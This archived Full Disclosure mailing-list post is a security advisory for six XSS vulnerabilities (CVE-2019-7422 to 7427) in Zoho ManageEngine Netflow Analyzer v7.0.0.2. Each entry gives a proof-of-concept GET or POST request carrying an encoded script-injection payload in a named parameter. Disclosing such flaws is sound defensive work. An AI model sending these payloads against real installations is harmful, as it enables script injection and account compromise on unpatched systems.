| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CANoQWWdf1OvsEF1Rp2PD_idDVB_sYCgOTRR0=17C=wFjTfssyg@mail.gmail.com> Date: Wed, 6 Feb 2019 07:44:22 +0100 From: Rafael Pedrero <rafael.pedrero@...il.com> To: fulldisclosure@...lists.org Subject: [FD] [CVE-2019-7422, CVE-2019-7423, CVE-2019-7424, CVE-2019-7425, CVE-2019-7426, CVE-2019-7427] Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7422 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/addMailSettings.jsp" file in the gF parameter. 2. Proof of Concept http://localhost:8080/netflow/jspui/addMailSettings.jsp?task=mail&firstTime=true&gF=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E Parameter gF 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7423 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/editProfile.jsp" file in the userName parameter. 2. Proof of Concept http://localhost:8080/netflow/jspui/editProfile.jsp?userName=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E Parameter userName. 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7424 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/index.jsp" file in the view GET parameter or any of these POST parameters: autorefTime, section, snapshot, viewOpt, viewAll, view, or groupSelName. The latter is related to CVE-2009-3903. 2. Proof of Concept http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=%22%3E%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&grDisp=3 Parameter view Via POST also is vulnerable with others parameters: autorefTime, section, snapshot, viewOpt, viewAll, view and groupSelName. 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7425 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in the task parameter. 2. Proof of Concept http://localhost:8080/netflow/jspui/linkdownalertConfig.jsp?task=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E&first=true Parameter task 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7426 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in the groupDesc, groupName, groupID, or task parameter. 2. Proof of Concept POST http://localhost:8080/netflow/jspui/groupConfiguration.jsp HTTP/1.1 moveLR=&moveRL=&clickSub=true&task=Add&flag=false&groupID=0&groupName=ddd&groupDesc=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&Submit32222=Guardar Parameter groupDesc, groupName, groupID and task 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7427 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in the autorefTime or graphTypes parameter. 2. Proof of Concept POST http://localhost:8080/netflow/jspui/NetworkSnapShot.jsp HTTP/1.1 setPerio=&firstTime=false&graphTypes=line&timeFrame=Today&autorefTime=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E Parameter autorefTime and graphTypes 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists